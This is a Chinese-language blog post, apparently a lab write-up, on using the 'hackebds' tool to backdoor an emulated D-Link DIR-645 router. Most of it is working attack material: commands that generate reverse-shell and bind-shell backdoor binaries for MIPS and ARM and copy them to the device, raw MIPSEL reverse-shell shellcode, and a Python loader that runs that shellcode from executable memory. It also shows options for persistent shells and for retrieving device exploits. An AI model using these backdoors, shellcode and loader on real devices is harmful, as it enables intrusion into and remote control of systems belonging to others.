嵌入式设备后门工具的利用

这里笔者也是直接跟着作者进行漏洞利用复现的

这里贴出师傅的文章:嵌入式设备后门与shellcode生成工具

简介

hackebds是嵌入到设备的工具,它有以下几种功能:

  • 生成各种架构的后门程序,后门程序是用于反向shell汇编代码打包的,大小很小,且纯静态,现目前支持rmv5、Armv7、Armv8、mipsel和mips,mips64,mips64el,powerpc,powerpc64,sparc,riscv64,mipsn32
  • 在攻击过程找那个生成各种架构的反向shell代码,且无空字节,有助于攻击嵌入式设备上的内存损害漏洞。
  • 生成各种架构的bind_shell
  • 针对嵌入式设备存在可利用的漏洞POC或EXP进行整理,在使用中可以通过搜索输出设备型号输得基本信息与POC。
  • 支持命令行生成后门和代买外壳,特点是轻便、小巧、高效、快速。

下载

bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
sudo pip3 install -U hackebds


########################################################################################################
bbq@ubuntu:~/tools$ hackebds -h
/home/bbq/.local/lib/python3.8/site-packages/fuzzywuzzy/fuzz.py:11: UserWarning: Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning
  warnings.warn('Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning')
usage: 

This tool is used for backdoor,shellcode generation,Information retrieval and POC arrangement for various architecture devices

optional arguments:
  -h, --help            show this help message and exit
  -reverse_ip REVERSE_IP, -lhost REVERSE_IP
                        reverse_ip set
  -reverse_port REVERSE_PORT, -lport REVERSE_PORT
                        reverse_port set
  -arch {aarch64,android,armebv5,armebv7,armelv5,armelv7,mips,mips64,mipsel,mips64el,mipsn32,mipsn32el,powerpc,powerpc64,powerpc64le,powerpcle,riscv64,sparc,sparc64,x64,x86}
                        Target arch architecturet
  -res {reverse_shell_file,reverse_shellcode,bind_shell,cmd_file,cveinfo}
  -passwd PASSWD        bind_shell set connect passwd
  -model MODEL, -m MODEL
                        device model,learn module
  -bind_port BIND_PORT, -bind BIND_PORT
                        bind_shell port
  -filename FILENAME, -f FILENAME
                        Generate file name
  -shell SHELL          cmd shell or execute file path
  -cmd CMD              Commands executed
  -envp ENVP            Commands envp
  -sleep SLEEP          the interval time in the continuous bounce shell, in seconds default is 5
  -encode, --encode     encode backdoor
  -power, --power       powerful reverse shell_file or bind_shell file
  -s, --search          Basic information and POC of search device
  -l, --list            print model information list
  -p, --poc             generated model's POC file
  -v, --version         Display version
  -CVE CVE, --CVE CVE   CVE ID
  -add, --add_model     Add model tree's node
bbq@ubuntu:~/tools$

然后作者介绍了好多种生成对应各种架构的后门程序,怎么说,笔者这里也是有点小蒙。

环境搭建

简单试一下吧,这里笔者的漏洞设备是D-Link DIR-645,可以参考笔者这篇文章:CNVD-2013-11625

尝试漏洞利用

生成后门程序

反弹shell

  • 这里笔者也是尝试了一下反弹mipsel架构的设备后门程序。因为网卡是自己配的,所以ip和端口都是知道的。
bash
1
hackebds -reverse_ip 192.168.100.254 -reverse_port 9999 -arch mipsel -res reverse_shell_file
  • 这里生成之后我们还是用scp传进模拟环境
bash
1
scp mips-backdoor-Mwpn  root@192.168.100.2:/
  • 传进去之后,监听9999端口,给文件一个可执行权限,之后运行该文件也是成功反弹上shell了

image-20250321165055825

  • 结束的话,终止这边的反弹shell即可

这里默认反向shell的使用的是sh,如果是使用bash则更改命令

bash
1
>hackebds -reverse_ip 192.168.100.254 -reverse_port 9999 -arch mipsel -res reverse_shell_file -shell bash

quem指令

bash
1
2
>ps aux | grep qemu #查看进程
>kill -9 XXXX       #终结进程

正向弹shell

  • 望文生义,就是正向弹shell
bash
1
hackebds -bind_port 9999 -arch mipsel -res bind_shell -passwd aaaa
  • 老样子scp传进去,运行程序,这边正向连接nc 192.168.100.2 9999

image-20250321213553871

生成shellcode

  • 这块生成的shellcode也是试了一下
bash
1
2
3
4
5
hackebds -reverse_ip 192.168.100.254 -reverse_port 9999 -arch mipsel -res reverse_shellcode
#########################################################################################################

\xfd\xff\x19\x24\x27\x20\x20\x03\xfd\xff\x19\x24\x27\x28\x20\x03\xff\xff\x06\x28\x57\x10\x02\x34\x0c\x01\x01\x01\xfc\xff\xa2\xaf\xfc\xff\xb0\x8f\xd8\xf0\x19\x3c\xfd\xff\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\x64\xfe\x09\x3c\xc0\xa8\x29\x35\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\x20\x28\xa0\x03\xef\xff\x19\x24\x27\x30\x20\x03\x4a\x10\x02\x34\x0c\x01\x01\x01\x26\x50\x4a\x01\x25\x28\x40\x01\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfe\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfd\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf8\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\x20\x20\xa0\x03\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf4\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xfc\xff\xa0\xaf\xf4\xff\xbd\x27\xff\xff\x05\x28\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\xfb\xff\x19\x24\x27\x28\x20\x03\x20\x28\xa5\x03\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\x20\x28\xa0\x03\xff\xff\x06\x28\xab\x0f\x02\x34\x0c\x01\x01\x01

这里笔者以为会像免杀一样,要写一个加载器之类的。这里也是直接拷打GPT,写了个python文件

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import ctypes
import mmap
import os

# MIPSEL Shellcode
shellcode = b"\xfd\xff\x19\x24\x27\x20\x20\x03\xfd\xff\x19\x24\x27\x28\x20\x03" \
            b"\xff\xff\x06\x28\x57\x10\x02\x34\x0c\x01\x01\x01\xfc\xff\xa2\xaf" \
            b"\xfc\xff\xb0\x8f\xd8\xf0\x19\x3c\xfd\xff\x39\x37\x27\x48\x20\x03" \
            b"\xf8\xff\xa9\xaf\x64\xfe\x09\x3c\xc0\xa8\x29\x35\xfc\xff\xa9\xaf" \
            b"\xf8\xff\xbd\x27\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\x20\x28\xa0\x03" \
            b"\xef\xff\x19\x24\x27\x30\x20\x03\x4a\x10\x02\x34\x0c\x01\x01\x01" \
            b"\x26\x50\x4a\x01\x25\x28\x40\x01\xdf\x0f\x02\x24\x0c\x01\x01\x01" \
            b"\xfe\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01" \
            b"\xfd\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01" \
            b"\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf8\xff\xa9\xaf\x97\xff\x19\x3c" \
            b"\xd0\x8c\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27" \
            b"\x20\x20\xa0\x03\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf4\xff\xa9\xaf" \
            b"\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf" \
            b"\xfc\xff\xa0\xaf\xf4\xff\xbd\x27\xff\xff\x05\x28\xfc\xff\xa5\xaf" \
            b"\xfc\xff\xbd\x23\xfb\xff\x19\x24\x27\x28\x20\x03\x20\x28\xa5\x03" \
            b"\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\x20\x28\xa0\x03\xff\xff\x06\x28" \
            b"\xab\x0f\x02\x34\x0c\x01\x01\x01"

# 创建可执行 mmap 区域
mem = mmap.mmap(-1, len(shellcode), mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS, mmap.PROT_WRITE | mmap.PROT_EXEC)

# 写入 shellcode
mem.write(shellcode)

# 定义 C 函数指针
shell_func = ctypes.CFUNCTYPE(ctypes.c_void_p)

# 让 Python 解释器调用 shellcode
shell_func = ctypes.cast(ctypes.addressof(ctypes.c_char.from_buffer(mem)), shell_func)

print("[+] Executing MIPSEL shellcode...")
shell_func()

直接就反弹shell了

image-20250321205426497

其他用法

  • 如果需要生成后门不断地创建反向shell
bash
1
hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file -shell bash -power
  • 如果需要每5秒创建一次反向shell
bash
1
hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 -arch mipsel -res reverse_shell_file -power -sleep 5
  • 生成cmd_file,只需要指定-cmd参数即可生成各种架构执行对应命令的程序
bash
1
hackebds  -cmd "ls -al /" -arch mipsel  -res cmd_file
  • 列出设备模块
bash
1
hackebds -l
  • 对设备进行检索
bash
1
2
pip3 install python-levenshtein #增加对设备检索的速度
hackebds -model mipsel -s
  • 生成设备对应的POC可以使用-p或者–poc,如果POC与EXP是python脚本那么会生成脚本文件(.py)
bash
1
hackebds -model ex200 -p
  • 对CVE进行检索
bash
1
hackebds -CVE CVE-2019-17621

总结

怎么说呢?这里笔者只试了三种方法,还有几种没用试,觉得也很不错,工具绝对是物超所值。感谢作者的工具对我的漏洞利用提供了莫大的帮助,在这里再次感谢作者。下方贴出作者的github工具地址。

感谢师傅写的工具:doudoudedi/hackEmbedded,喜欢这个工具的可以给作者点一个星星。

image-20250321213653336

特别感谢:

inf_师傅

感谢师傅对笔者的莫大帮助!!!